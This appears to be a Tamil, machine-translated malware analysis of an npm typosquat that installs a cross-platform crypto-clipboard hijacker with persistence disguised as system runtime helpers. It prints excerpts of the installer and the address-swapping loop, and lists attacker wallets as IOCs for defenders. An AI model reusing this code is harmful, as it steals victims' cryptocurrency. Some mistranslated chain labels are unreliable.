ரன்டைம்ப்ரோக்கர் என்பிஎம் டைபோஸ்க்வாட் பிளான்ட்ஸ் கிரிப்டோ கிளிப்பர்

RuntimeBroker: ஒரு npm டைபோஸ்க்வாட், 40-செயின் கிரிப்டோ-கிளிப்பரை ஒரு பல-இயங்குதள "சிஸ்டம் ரன்டைம் ஹெல்பராக" நிறுவுகிறது.

பொருளடக்கம்

கட்டாயம் படிக்க வேண்டிய பதிவுகள்

சமீபத்திய சுவாரஸ்யமான பதிவு

டிஎல்; DR

2026-05-21 அன்று, npm பப்ளிஷர் jaggle ஒன்பது பதிப்புகளை வெளியிட்டது (1.0.0 மூலம் 1.0.8) @jaggle/resizeobserves தோராயமாக இரண்டு மணி நேர கால அவகாசத்தில்.

இந்தத் தொகுப்பு, முறையானதின் எழுத்துப்பிழைத் தவறாகும். @juggle/resize-observer பாலிஃபில் என்பது வாரந்தோறும் மில்லியன் கணக்கான பதிவிறக்கங்களைக் கொண்ட, பரவலாகப் பயன்படுத்தப்படும் ஒரு தொகுப்பு ஆகும், ஆனால் அது உண்மையான ResizeObserver செயலாக்கத்தை வழங்கவில்லை.

மாறாக, தொகுப்பின் போஸ்ட்இன்ஸ்டால் ஹூக் ஒரு தொகுக்கப்பட்ட பைதான் பேலோடை நிறுவி, ஒரு இயங்குதள-இயல்புடைய தோற்றமுடைய ரன்டைம் புரோக்கராக பெர்சிஸ்டன்ஸைப் பதிவுசெய்து, கிரிப்டோகரன்சி பரிவர்த்தனைகளைக் குறிவைக்கும் ஒரு பல-இயங்குதள கிளிப்போர்டு ஹைஜாக்கரைச் செயல்படுத்துகிறது.

லினக்ஸ் நிலைத்தன்மை பின்வருமாறு தோன்றுகிறது python3-dbus-helper, MacOS as com.apple.python.runtime, மற்றும் விண்டோஸ் as PyRuntimeBroker.

பேலோட், வாலட் முகவரிகளுக்காக கிளிப்போர்டை தொடர்ந்து கண்காணித்து வருகிறது. 40க்கும் மேற்பட்ட பிளாக்செயின்கள் மேலும், நகலெடுக்கப்பட்ட முகவரிகளுக்குப் பதிலாக, தாக்குபவரால் கட்டுப்படுத்தப்படும் வாலெட்டுகளை அமைதியாக மாற்றுகிறது.

இந்த மால்வேர், எந்தவொரு வெளிச்செல்லும் C2 உள்கட்டமைப்பும் இன்றி முற்றிலும் உள்ளூரிலேயே செயல்படுவதால், கிளிப்போர்டு மாற்றீடே தரவைத் தரவு கசிவுக்கான வழிமுறையாக அமைகிறது.

முதன்மை IOC என்பது தொகுப்பின் பெயரே ஆகும்: @jaggle/resizeobserves — “jaggle” என்பதில் விடுபட்ட உயிரெழுத்தையும், “resizeobserves” என்பதில் சேர்க்கப்பட்ட “s” எழுத்தையும் கவனிக்கவும்.

தீவிரம்: அதிகம்.

தாக்குதல்: அது எவ்வாறு செயல்படுகிறது

npm:@jaggle/resizeobserves சாதாரணமாகப் பார்க்கும்போது இது தீம்பொருள் போலத் தெரியவில்லை. npm பார்வை. அதன் README.md இதன் வார்த்தைக்கு வார்த்தையான README ஆகும் npm:@juggle/resize-observer — அதே குறியீடு மாதிரிகள், அதே பயன்பாட்டு வழிமுறைகள், அதே import { ResizeObserver } from '@juggle/resize-observer' முழுவதும் மேற்கோள்கள் உள்ளன. கருத்துத் திருட்டு எந்த அளவுக்கு முழுமையாக உள்ளது என்றால், இந்த ஆவணங்களை மேலோட்டமாகப் பார்ப்பவர் எவரும், தாங்கள் உண்மையான மென்பொருளின் ஆவணங்களைப் படிக்கிறோம் என்றே கருதிவிடுவார்கள்.

தி தொகுப்பு.ஜேசன்இதற்கு மாறாக, அரிதாக உள்ளது: இல்லை களஞ்சியம் புலம், ஒரு ஒற்றை நான் நுழைவு சுட்டிக்காட்டுகிறது bin/clipboard-guardian.js, மற்றும் ஒரு நிறுவிய பின் இயங்கும் ஸ்கிரிப்ட் node npm-install.jsREADME-இல் உள்ள “அடிப்படைப் பயன்பாடு” எடுத்துக்காட்டுகள், tarball-இல் எங்கும் இல்லாத ஒரு ஜாவாஸ்கிரிப்ட் செயலாக்கத்தைக் குறிப்பிடுகின்றன. அந்தத் தொகுப்பில் உள்ள ஒரே ஜாவாஸ்கிரிப்ட், நிறுவல் ஸ்கிரிப்ட் மட்டுமே.

நிலை 1 — npm postinstall ஒரு பைதான் பேலோடைத் துவக்குகிறது.

npm-install.js இயங்குதளத்தைப் பற்றிய விழிப்புணர்வு கொண்டது. அது ஒரு இடத்தைக் கண்டறிகிறது. பிப் ஒரு நிலையான தேடல் பாதையில் இயக்கக்கூடியது (/usr/bin/pip3, /usr/local/bin/pip, பின்வாங்குதல் python3 -m pip), டார்பால் கோப்பகத்திலிருந்து தொகுக்கப்பட்ட பைதான் தொகுப்பை நிறுவுகிறது, மேலும் — லினக்ஸில் — உள்ளிழுக்கிறது. xclip or xsell வழியாக apt-get, Pacman, அல்லது DNF இரண்டும் ஏற்கனவே இல்லை என்றால்:

javascript if (PLATFORM === "linux" && !silent("which xclip") && !silent("which xsel")) {   run("apt-get install -y xclip 2>/dev/null") ||   run("pacman -S --noconfirm xclip 2>/dev/null") ||   run("dnf install -y xclip 2>/dev/null"); }  if (   !run(`${pip} install --quiet --upgrade --break-system-packages "${PKG_DIR}"`) &&   !run(`${pip} install --quiet --upgrade "${PKG_DIR}"`) ) process.exit(1); 

பயன்படுத்த –பிரேக்-சிஸ்டம்-பேக்கேஜ்கள் இது வேண்டுமென்றே செய்யப்பட்டது: நவீன லினக்ஸ் விநியோகங்கள், PEP 668-இன் வெளிப்புறமாக நிர்வகிக்கப்படும் சூழல் குறியீட்டை இயக்கியவாறே பைத்தானை வழங்குகின்றன, இது இயல்பாகவே தளம் தழுவிய pip நிறுவல்களைத் தடுக்கிறது. நிறுவல் ஸ்கிரிப்ட் அந்த நிறுவலைக் கட்டாயப்படுத்திச் செய்கிறது.

இந்த ஸ்கிரிப்ட் சூடோ-அறியும் திறன் கொண்டது. இயங்கும் uid ஒரு இன் விளைவாக இருக்கும்போது sudo npm install, அந்த ஸ்கிரிப்ட் கூறுகிறது SUDO_USER மற்றும் பணயங்களை வெளியே அனுப்புகிறது getent passwd கண்டுபிடிக்க உண்மையான பயனரின் முகப்பு அடைவில் எழுதி, பின்னர் அதன் நிலைத்தன்மை கோப்புகளை அதற்குப் பதிலாக அங்கே எழுதுகிறது. / ரூட்நிலைத்தன்மை என்பது பயனர் வாரியானது, அமைப்பு முழுமைக்குமானது அல்ல.

நிலை 2 — இயக்க நேரத் தரகர் பெயர்களின் கீழ் இயங்குதளங்களுக்கிடையேயான நிலைத்தன்மை

பைதான் தொகுப்பு நிறுவப்பட்ட பிறகு, அந்த ஸ்கிரிப்ட் ஒவ்வொரு இயக்க முறைமையிலும் ஒரு வெவ்வேறு பெயரில் தானியங்கு தொடக்கப் பதிவை உருவாக்குகிறது:

  • லினக்ஸ் — ஒரு systemd பயனர் அலகு ~/.config/systemd/user/python3-dbus-helper.serviceஅந்த அலகின் விளக்கம் is பைதான் டி-பஸ் இயக்க நேர உதவியாளர்அந்த ஸ்கிரிப்ட் இதன் வழியாகவும் அதை இயக்க முயற்சிக்கிறது. systemctl –user enableகீழ் ஒரு கைமுறை சிம்லிங்கிற்குத் திரும்புதல் இயல்புநிலை.இலக்கு.விரும்புகிறது/ systemctl செயலிழக்கும்போது. sudo-வின் கீழ் இயங்கினால், ஸ்கிரிப்ட் இதற்கு மாறுகிறது. சூடோ -யு systemctl –user, உடன் XDG_RUNTIME_DIR பயனர்-பஸ் அழைப்பு செயல்படுமாறு அமைக்கவும்.
  • MacOS — ஒரு LaunchAgent plist இல் ~/Library/LaunchAgents/com.apple.python.runtime.plist உடன் RunAtLoad=true மற்றும் KeepAlive=trueபின்னர் இதன் வழியாக ஏற்றப்பட்டது launchctl load.
  • விண்டோஸ் — PyRuntimeBroker என்ற பெயரிடப்பட்ட ஒரு திட்டமிடப்பட்ட பணி, AtLogOn நேரத்தில் தூண்டப்பட்டு, பூஜ்ஜிய இயக்க நேர வரம்புடன் (அதாவது, காலக்கெடு இல்லாமல்), பவர்ஷெல் வழியாகப் பதிவுசெய்யப்பட்டது.

மூன்று பெயர்களுமே மேலோட்டமாகப் பார்க்கும்போது நம்பகமானவையாகத் தெரிகின்றன. python3-dbus-helper லினக்ஸ் டெஸ்க்டாப்களில் முறையான பைதான்-டி-பஸ் ஒருங்கிணைப்பின் பெயரிடும் மரபைப் பின்பற்றுகிறது. com.apple.python.runtime ஆப்பிளின் சொந்த சேவைகளுக்கான ரிவர்ஸ்-டிஎன்எஸ் லேபிளிங்கைப் பின்பற்றுகிறது. பைரன்டைம்ப்ரோக்கர் விண்டோஸின் எதிரொலிகள் RuntimeBroker.exe — UWP செயலிகளுக்கான அனுமதி கோரிக்கைகளுக்கு இடைத்தரகராகச் செயல்படும் ஒரு உண்மையான, கையொப்பமிடப்பட்ட மைக்ரோசாஃப்ட் சேவை. இந்தச் சூழலில் இவை எதுவும் உண்மையான ஆப்பிள்/மைக்ரோசாஃப்ட்/பைதான் சேவைகள் அல்ல, ஆனால் ஒரு பாதுகாவலர் விரைவாகப் பார்வை மூலம் ஆய்வு செய்யும்போது... systemctl –user list-units or கெட்-திட்டமிட்ட பணி பின்வாங்க வாய்ப்பில்லை.

நிலை 3 — கிளிப்போர்டு கடத்தல்காரர்

பைதான் பேலோட், நிறுவப்பட்டது clipboard_guardian/guardian.pyஇது, ஒவ்வொரு 400 மில்லி வினாடிக்கும் கணினி கிளிப்போர்டை ஆய்வு செய்யும் ஒரு முடிவற்ற சுழற்சியை இயக்குகிறது. ஒவ்வொரு சுழற்சியின் போதும், இது தற்போதைய கிளிப்போர்டின் உள்ளடக்கங்களை இதன் வழியாகப் பெறுகிறது. pyperclip.paste() மேலும் இது, Ethereum, Bitcoin, Monero, Solana, TRON, TON, Ripple, Litecoin, Dogecoin, Polkadot, NEAR, Cosmos, Algorand, Stellar, Cardano, Bitcoin Cash, Dash, Zcash, Aptos, Sui, Tezos, MultiversX, Harmony, Terra, Injective, Osmosis, Kava, Celestia, Nano, Filecoin, Ronin, Ergo, DigiByte, Hedera, BNB Smart Chain மற்றும் இயல்புநிலை உள்ளமைவில் (default config) வெற்றுப் பகுதியாகக் குறிக்கப்பட்ட ஆனால் காலியாக உள்ள பல (Sei, IOTA, Kaspa, Flow, Nervos, Decred, Ravencoin) ஆகியவற்றின் வாலட்-முகவரி வடிவங்களை உள்ளடக்கிய, நாற்பதுக்கும் மேற்பட்ட முன்-தொகுக்கப்பட்ட ரெகுலர் எக்ஸ்பிரஷன்களின் பட்டியலுக்கு எதிராக அவற்றை இயக்குகிறது.

ஒரு பொருத்தம் ஏற்படும்போது, ​​அந்த ஸ்கிரிப்ட் அந்தச் சங்கிலிக்கான தாக்குபவரின் முகவரியை இதிலிருந்து படிக்கிறது. ~/.config/clipboard-guardian/config.json (அல்லது அதன் இயங்குதள சமமானவற்றை) இயக்கி, மாற்றப்பட்ட உரையைக் கொண்டு கிளிப்போர்டை மேலெழுதும்:

python result = find_address_in_text(current, config) if result is None:     time.sleep(POLL_INTERVAL)     continue  chain, found_addr = result my_addr = config[chain] if found_addr == my_addr:     time.sleep(POLL_INTERVAL)     continue  new_text = replace_address_in_text(current, found_addr, my_addr) clipboard_set(new_text) 

நெட்வொர்க் பீக்கன் எதுவும் இல்லை. கிளிப்பர் அதன் மூல அலுவலகத்திற்குத் தகவல் அனுப்புவதில்லை, பாதிக்கப்பட்ட ஹோஸ்ட்களைப் பதிவு செய்வதில்லை, எதையும் வெளியேற்றுவதில்லை. அந்த வெளியேற்றமே பதிலீடுதான்: ஒரு பயனர் தனது வாலட் பயனர் இடைமுகத்திலிருந்து (UI) பெறுநர் முகவரியை நகலெடுத்து, அனுப்பும் உரையாடல் பெட்டியில் ஒட்டும்போது, ​​ஒட்டப்பட்ட அந்த முகவரி இயக்குபவருக்குச் சொந்தமாகிறது. பயனருக்குத் தெரியாமல், நிதிகள் அதே வழியில் இழக்கப்படுகின்றன.

இங்கே புதிதாக என்ன இருக்கிறது?

பொதுவான கிரிப்டோ-கிளிப்பர் டெம்ப்ளேட்டுடன் ஒப்பிடும்போது சில விவரங்கள் தனித்து நிற்கின்றன:

1. npm → Python கலப்பு. npm-ல் நாம் காணும் பெரும்பாலான கிரிப்டோ-கிளிப்பர்கள் தூய ஜாவாஸ்கிரிப்ட் ஆகும், அவை பெரும்பாலும் வேறு சிலவற்றால் மறைக்கப்படுகின்றன. _0x வரிசை சுழற்சி அல்லது eval(atob(…)) இந்த மாதிரி, npm டார்பாலை ஒரு பைதான் தொகுப்பிற்கான விநியோக உறையாக மட்டுமே பயன்படுத்துகிறது — இது ஒரு தூய்மையான பைதான் தொகுப்பு — மேலும் சார்புநிலைகளின் நிறுவலை pip கையாள அனுமதிக்கிறது.பைப்பர்கிளிப், psutil, விருப்பமானது setproctitle) தொகுப்பில் அறிவிக்கப்பட்டது pyproject.tomlமுறியடிக்க வேண்டிய ஜாவாஸ்கிரிப்ட் மறைப்பு எதுவும் இல்லை. அந்த கிளிப்பர், தெளிவான, படிக்கக்கூடிய பைத்தான் ஆகும்.

2. நம்பகத்தன்மை கருதி ட்ரை-ஓஎஸ் நிலைத்தன்மை குறியீடுகள் தேர்ந்தெடுக்கப்பட்டன. பல குறுக்கு-தள நிறுவிகள் நிலைத்தன்மையை பொதுவான பெயர்களின் கீழ் பதிவு செய்கின்றன (புதுப்பிப்பான்.சேவை, helper.plistஇந்த மாதிரி, ஒவ்வொரு இயக்க முறைமையிலும் (OS) உள்ள இயங்குதளத்திற்கே உரிய ரன்டைம் புரோக்கர்களை ஒத்திருக்கும் லேபிள்களைத் தேர்ந்தெடுப்பதில் மெனக்கெடுகிறது. இந்தப் பெயரிடல் மட்டுமே ஒரு மறைமுக முயற்சியாகும் — இதில் ரூட்கிட் இல்லை, பயனர் பகுதியை மறைத்தல் இல்லை, பாதை தெளிவின்மை இல்லை. பாதுகாப்பாளர்கள் அரிதாகவே தணிக்கை செய்வார்கள் என்பதே இதன் அடிப்படை அனுமானம். ~/.config/systemd/user/ மற்றும் ஒரு சேவை பெயரிடப்பட்டது python3-dbus-helper மேலோட்டமான மதிப்பாய்வில் தனித்துத் தெரியாது.

3. செயல்முறைத் தலைப்பு மாறுவேடம் உண்மையானது, ஆனால் பகுப்பாய்வு எதிர்ப்பு செயலற்று இருக்கிறது. பைதான் பேலோட் வரையறுக்கிறது _disguise_process() செயல்முறை தலைப்பை இதன் மூலம் அமைக்கும் செயல்பாடு setproctitle (லினக்ஸ்/மேக்ஓஎஸ்) அல்லது SetConsoleTitleW (விண்டோஸ்) — மற்றும் முக்கிய () அதை அழைக்கிறது. அதனால் ps aux காண்பிக்கும் python3-dbus-helper அதற்கு பதிலாக python3 …/guardian.pyஇருப்பினும், அதே தொகுதி ஒரு வரையறுக்கிறது is_monitor_running() அறியப்பட்ட செயல்முறை கண்காணிப்புக் கருவிகளைப் பட்டியலிடும் செயல்பாடு (htop, பிடாப்டாஸ்க் மேனேஜர், ஆக்டிவிட்டி மானிட்டர், பிராசஸ் ஹேக்கர், ரிசோர்ஸ் மானிட்டர், GNOME / KDE / Xfce / MATE சிஸ்டம் மானிட்டர்கள், மற்றும் பல) — மற்றும் முக்கிய () அது ஒருபோதும் அதை அழைப்பதில்லை. பயனர் ஒரு செயல்முறை கண்காணிப்பானைத் திறந்து வைத்திருந்தாலும் இல்லாவிட்டாலும், பதிலீட்டுச் சுழற்சி நிபந்தனையின்றி இயங்குகிறது. வெளியிடப்பட்ட பதிப்பில் இந்தச் செயல்பாடு பயனற்ற குறியீடாக உள்ளது. இது பெரும்பாலும் முந்தைய பதிப்பின் மிச்சமாகவோ, அல்லது இன்னும் இணைக்கப்படாத ஒரு அம்சத்திற்கான கட்டமைப்பாகவோ இருக்கலாம். எப்படியாயினும், வெளியிடப்பட்ட தரவுப் பொதியின் பகுப்பாய்வுத் தடுப்புப் பரப்பு என்பது ஒரு செயல்முறைத் தலைப்புப் பெயர்மாற்றமே தவிர, செயல்திறன் மிக்க கண்காணிப்பானைத் தவிர்ப்பது அல்ல.

4. தொகுக்கப்பட்ட உள்ளமைவு-இணைப்புச் செயல்பாடு. npm-install.js இயல்புநிலை பணப்பை பட்டியலை எழுதுகிறது ~/.config/clipboard-guardian/config.json மேலும், ஒரு உள்ளமைவு கோப்பு ஏற்கனவே இருந்தால், தற்போதுள்ள மதிப்பு காலியாக உள்ள எந்த விசைகளையும் அது இணைத்துவிடும். அதாவது, முன்பு தொற்றுக்கு உள்ளாகி, உள்ளமைவை ஓரளவு சுத்தம் செய்த ஒரு பயனர் — உதாரணமாக, அதை காலி செய்வதன் மூலம் — ethereum மதிப்பு — ஒவ்வொரு அடுத்தடுத்த தீங்கிழைக்கும் தொகுப்பு நிறுவலின்போதும் இது மீண்டும் நிரப்பப்படும். எந்தக் குறியீட்டுப் பாதையிலும் இந்த நிலைத்தன்மைக் கோப்பு சுத்தப்படுத்தப்படுவதில்லை.

தேதி / நேரம் (UTC) நிகழ்வு
2026-05-21 18:50:32 @jaggle/resizeobserves@1.0.0 வெளியிடப்பட்டது.
2026-05-21 19:55:55 1.0.1 வெளியிடப்பட்டது — முதல் பதிப்பு வெளிப்புற ஆய்வின் மூலம் கண்டறியப்பட்டது.
2026-05-21 19:58:10 1.0.2 வெளியிடப்பட்டது.
2026-05-21 20:05:03 1.0.3 வெளியிடப்பட்டது.
2026-05-21 20:09:24 1.0.4 வெளியிடப்பட்டது.
2026-05-21 20:13:48 1.0.5 வெளியிடப்பட்டது.
2026-05-21 20:41:52 1.0.6 வெளியிடப்பட்டது.
2026-05-21 20:43:56 1.0.7 வெளியிடப்பட்டது — ஒரு சேர்க்கிறது try/catch wallet-config எழுதும் படிநிலையைச் சுற்றியுள்ள உறை npm-install.js.
2026-05-21 20:46:15 1.0.8 வெளியிடப்பட்டது — நிறுவியின் பெயர் மாற்றப்பட்டது npm-install.jsnpm-install.cjs (பைட்-ஒத்த உள்ளடக்கம்).
2026-05-22 தீர்ப்புகளும் IOC-களும் வெளியிடப்பட்டன. வெளியிடும் நேரத்தில் பதிப்புகள் பதிவகத்தில் இன்னும் உள்ளன (தொடர்ந்து நடைபெறுகிறது).

ஒரு மணி நேரம் ஐம்பத்தாறு நிமிடங்களில் ஒன்பது பதிப்புகள் என்பது, தட்டச்சுப் பிழை திருத்துபவருக்கே கூட வேகமானதுதான். இந்த முறை பின்வருவனவற்றுடன் ஒத்துப்போகிறது. வெளியிட்டு எரிக்கும் பிரச்சாரம் — பதிவகத்தை ஒரே ஹேண்டிலின் கீழ் நிரப்பி, கண்டறிதல் அதன் போக்கில் செல்ல அனுமதித்து, ஒரு பதிப்பு நீக்கப்பட்டவுடன் புதிய ஹேண்டிலுக்கு மாறவும். இந்தச் செயல்பாட்டின் போது தெரியும் வேறுபாடுகள் தோற்றரீதியானவை: 1.0.1 பதிப்பில் வெளிப்படையான மாற்றம் சேர்க்கப்பட்டது. /usr/bin/pip3pip தேடல் பட்டியலுக்கான -style பாதைகள் (sudo-இணக்கத்தன்மை), 1.0.7 பதிப்பு wallet-config எழுதும் செயல்பாட்டை ஒரு try/catch-க்குள் இணைத்தது, மற்றும் 1.0.8 பதிப்பு நிறுவியை இதிலிருந்து மறுபெயரிட்டது. .js க்கு .cjs அதன் உள்ளடக்கத்தை பைட்-ஒரே மாதிரியாக வைத்திருக்கும் அதே வேளையில். .cjs வெளிப்படையான அனுமதி இல்லாத தொகுப்புகளில் தெளிவற்ற தொகுதித் தீர்மானம் குறித்த npm எச்சரிக்கைகளுடன் டிராக்குகளை மறுபெயரிடுதல் "வகை" இது, கவனத்தை ஈர்க்கக்கூடிய நிறுவல் நேரக் குழப்பத்தை அடக்குவதற்கான ஒரு முயற்சியாக இருக்கலாம். உண்மையில் தரவைத் திருடும் ஒரே பகுதியான பைதான் பேலோட், ஒன்பது பதிப்புகளிலும் மாற்றமின்றி உள்ளது.

சமரசத்தின் குறிகாட்டிகள்

தொகுப்புகள்

சூழல் தொகுப்பு பதிப்புகள் நிலைமை
NPM @jaggle/resizeobserves 1.0.0 மூலம் 1.0.8 வெளியீட்டின் போது நேரலையில் உள்ளது; நீக்கக் கோரப்பட்டுள்ளது.

கோப்புகள் மற்றும் ஹாஷ்கள்

பாதை குறிப்புகள்
clipboard_guardian/guardian.py
(md5 f7935c2c82bc881288611ab6cd634f17)
வெளியிடப்பட்ட ஒன்பது பதிப்புகள் அனைத்திலும் ஒரே மாதிரியாக உள்ளது (1.0.0 மூலம் 1.0.8கிளிப்பர் பேலோட்.
npm-install.js (1.0.0 – 1.0.7)
npm-install.cjs (1.0.8)
நிலைத்தன்மை நிறுவி; முழுமையான அதே செயல்பாடு. 1.0.7's .js மற்றும் 1.0.8's .cjs பைட் அளவில் ஒத்தவை.
~/.config/clipboard-guardian/config.json லினக்ஸ் நிலைத்தன்மை கட்டமைப்பு மற்றும் வாலட் தொகுப்பு.
~/Library/Application Support/clipboard-guardian/config.json macOS நிலைத்தன்மை கட்டமைப்பு மற்றும் வாலட் தொகுப்பு.
%APPDATA%\clipboard-guardian\config.json விண்டோஸ் நிலைத்தன்மை கட்டமைப்பு மற்றும் வாலட் தொகுப்பு.
~/.config/systemd/user/python3-dbus-helper.service லினக்ஸ் தானியங்கு தொடக்க நிலைத்தன்மை.
~/Library/LaunchAgents/com.apple.python.runtime.plist macOS LaunchAgent நிலைத்தன்மை.
~/Library/Logs/com.apple.python.runtime.log ஏஜென்ட்டிற்கான macOS stdout/stderr பதிவேடு.
Scheduled Task PyRuntimeBroker விண்டோஸ் தானாகத் தொடங்கும் பணி (AtLogOnகாலக்கெடு இல்லை).

நடத்தை குறிகாட்டிகள்

சிக்னல் விளக்கம்
pip install --break-system-packages npm postinstall இலிருந்து PEP 668 பாதுகாப்புகளை மீறி, தளம் முழுவதும் பைத்தான் நிறுவலைக் கட்டாயப்படுத்துகிறது.
apt-get install -y xclip (அல்லது பேக்மேன்/டிஎன்எஃப்) லினக்ஸில் தொகுப்பு நிறுவலின் போது கிளிப்போர்டு பயன்பாடுகளை நிறுவுகிறது.
python3-dbus-helper.service systemd பயனர் அலகு நம்பகத்தன்மை வாய்ந்ததாகத் தோன்றும் ஒரு ரன்டைம்-ஹெல்பர் பெயரின் கீழ் நிலைத்தன்மை பதிவுசெய்யப்பட்டுள்ளது.
com.apple.python.runtime துவக்க முகவர் முறையான ஆப்பிள் சிஸ்டம் பாதைகளுக்கு வெளியே உள்ள நிலைத்தன்மை லேபிள்.
PyRuntimeBroker திட்டமிடப்பட்ட பணி முறையான நிறுவி மூலம் இல்லாத போலி விண்டோஸ் ரன்டைம் புரோக்கர் நிலைத்தன்மை.
பைதான் செயல்முறை python3-dbus-helper இறக்குமதி pyperclip மற்றும் psutil காட்டப்படும் செயல்முறைப் பெயருக்கும் இறக்குமதி செய்யப்பட்ட நூலகங்களுக்கும் இடையே நடத்தை ரீதியான பொருந்தாமை.
வாலட் முகவரி நகலெடுக்கப்பட்ட சுமார் 0.4 விக்குப் பிறகு கிளிப்போர்டு மாறுகிறது. கிரிப்டோகரன்சி முகவரி மாற்றீட்டின் கையொப்ப நடத்தை.

தாக்குபவர் பணப்பைத் தொகுப்பு (பாதுகாப்பாளர் வேட்டைப் பட்டியல்)

வாலட் பட்டியல் நிரலில் நேரடியாகக் குறிப்பிடப்பட்டுள்ளது. npm-install.js மற்றும் clipboard_guardian/guardian.pyபாதுகாப்பாளர்கள் இந்தப் பட்டியலை ஒரு தடுப்புப் பட்டியலாகவும் (நிறுவன பணப்பைகளிலிருந்து இந்த முகவரிகளுக்கு செய்யப்படும் எந்தவொரு பரிமாற்றத்தையும் சந்தேகத்திற்குரியதாகக் கருதுதல்) மற்றும் ஒரு தேடல் திறவுகோலாகவும் (அங்கீகரிக்கப்படாத உள்ளமைவு கோப்பு, உருவாக்கக் கூறு அல்லது உருவாக்குநர் கணினியில் இந்தச் சரங்களில் ஏதேனும் ஒன்று இருப்பதை ஒரு தொற்று அறிகுறியாகக் கருதுதல்) பயன்படுத்தலாம்.

தாக்குதல் பணப்பை தொகுப்பு

செயின் முகவரி
எத்தேரியம் / பிஎஸ்சி 0x450c0E58Fc2ba03632d3F5780ad8C966648B6F18
ரோனின் (ஈவிஎம்) ronin:450c0E58Fc2ba03632d3F5780ad8C966648B6F18
Bitcoin bc1qs2mpls4p0f7fng073gy2rcdgjpf7la4eugpt6y
Bitcoin Cash bitcoincash:qqmvyxxklzp7l3eslxavhc8phl6hprdf25lwc29nlt
Litecoin ltc1qnefc8x59a9cwtqnflt8hmqvezqw4hc7lt3fkqe
Dogecoin DNEJmYRZtzyK44tZea4S7wV3otTyRk48Fy
சிறுகோடு XtJ7E6mnhPK93Vib29PGQrTmQjhTTqFwbS
Zcash t1d4hcEnBjdh9X6Wb6R2dxqjnxddJ6ocP8M
DigiByte DPmH2dhiGK3hk3A69tZUMz6tHzGFHBzSrH
Monero 42zhAidVhP7QETk83JAspS59ASALSHFio44vmu6MdDCz15cSqtqsG4QVyzY8vTrjGrTEA6zMbWW6Yft1Ynz1xLfCN5FVbXf
சோலானா DWBAmQLi9gP6mk7UfJfQGYTV1UPK32WekLTqg83q1mc5
ட்ரான் TVgEgMemmJABYYnbNr1Wi8bSgADEkdEBt2
TON UQDTSkvwmptU9eG988KgxS3WjnYAZlXgfpJxnz4mhWZAvULr
Ripple r9tj3cMCiqRijNYqNVYNuwKykkQfS8FE4H
polkadot 1JSkYqXQE4d28HdcmTPhbgCrdiPFTfSHxD67tam16p53oBG
NEAR 5d6aec44551529e8cd9ebd3aaa84b3832fc3c7463596b2b6e72635b80096a364
காஸ்மோஸ் cosmos1pzfl3kv5g8g0ernj86rwpar08u2zl9suthx28e
சவ்வூடுபரவல் osmo1pzfl3kv5g8g0ernj86rwpar08u2zl9surv463t
செலஸ்டியா celestia1pzfl3kv5g8g0ernj86rwpar08u2zl9su6ah6a5
உள்நோக்கு inj1g5xquk8u9wsrvvkn74uq4kxfvejgkmccn578gh
காவா kava1kjfvgcz4q0y9yae2f3pa33vhj2estxxj3sqqux
ஹார்மனி one19hn0n7dzkhtl9ta9ekv5592s85jwstpka76t3a
டெர்ரா terra1h0dwu8z405jagdlr0fgr9jllac2sxajzlgme5x
Algorand XSAMN3FTB5SUHUQFENBDDRXIMOPNFVLKAWA3RNOU54DWROMDZ6SR7DZ2PI
நட்சத்திர GACNZSV4EQO65NZZUOBS3TMJM7GFTSRNKQBVJOX5P2G7U7SEBQ2ZUDJE
Cardano addr1qyj050vla4cglmyrgm4vzf3dxtn0gynpks4t7vp7s3lg49e9wt0s94hcztzdgecxcz5hu9uk56q60yth6d66w026s2kq3ma56f
மல்டிவர்ஸ்எக்ஸ் erd1slvlgqsmwzk0c8xtksm4eq5vdfnc26slpzqsyxhz456zvme5rpasue6ge0
அப்டோஸ் 0x580ecda1ebd6ca5a46be2097568d013308bd54ef1d147acb880b59f7709f280e
சூய் 0xf7e8a9a970fa65c058745c4b2cf2a856cc0283863e4ed1e142648f26097b0c78
நானோ nano_393n56a5pfz8zg3nkzf7mytfgagzhu5mn9i3xiqg54weq8n1u8jgezxas7dn
Filecoin f1fypyww3xubopfnv7q6yh5l4bko44wmfktf3ckui
Tezos tz1RccjnorHk61bt73ArLXcdgFjEj6T1ochk
எனவே 9g1pNQGnFg7Hk1d9Z66bgHMkguGU7R41btypAnbG1NF5FJoNdBA
தலைப்பு 0.0.10488092

இயல்புநிலை உள்ளமைவில் ரெஜெக்ஸ் கவரேஜ் இருந்தும் காலியான வாலட் இடங்களைக் கொண்ட செயின்களான — Sei, IOTA, Kaspa, Flow, Nervos, Decred, Ravencoin, Beacon-Chain BNB — இந்த உருவாக்கத்தில் முனைப்புடன் பதிலீடு செய்யப்படுவதில்லை, ஆனால் கண்டறியப்படுகின்றன. அவற்றை பதிலீட்டு வரம்பாகக் கருதாமல், கண்காணிப்பு வரம்பாகக் கருதுங்கள்.

காரணம் மற்றும் உந்துதல்

இந்த பிரச்சாரம், குற்றம் சாட்டப்பட்டவரை அடையாளம் காண்பதற்கான வாய்ப்பைக் குறைக்கிறது. இயக்குபவரின் அடையாளத்தை எங்களால் உறுதிப்படுத்த முடியவில்லை. எங்களால் பதிவு செய்ய முடிந்தவை:

  • பதிப்பாளர் மெட்டாடேட்டா. npm கணக்கு ஜாகில் அதன் மின்னஞ்சலை இவ்வாறு பட்டியலிடுகிறது olgascarlet@deltajohnsons.comடொமைன் டெல்டாஜான்சன்ஸ்.காம் எங்களால் சரிபார்க்கக்கூடிய ஒரு நிறுவன அடையாளமாக இது அமையவில்லை. npm கணக்கில் மின்னஞ்சல் சரிபார்ப்பு எதுவும் காட்டப்படவில்லை. SCM சரிபார்ப்பு. இது தொடர்பான பொதுவான கிட்ஹப் இருப்பு எதுவும் இல்லை.
  • களஞ்சியப் புலம். தி தொகுப்பு.ஜேசன் இல்லை களஞ்சியம் புலம். சட்டபூர்வமான npm:@juggle/resize-observer ஆயிரக்கணக்கான நட்சத்திர மதிப்பீடுகளையும் செயலில் உள்ள சிக்கல்களையும் கொண்ட ஒரு உண்மையான GitHub களஞ்சியத்தை இது சுட்டிக்காட்டுகிறது. ஒரு களஞ்சிய இணைப்பு இல்லாததே, npm பயனர் இடைமுகத்தில் இதைக் காட்டிக்கொடுக்கும் மிக வேகமான ஒற்றை அறிகுறியாகும்.
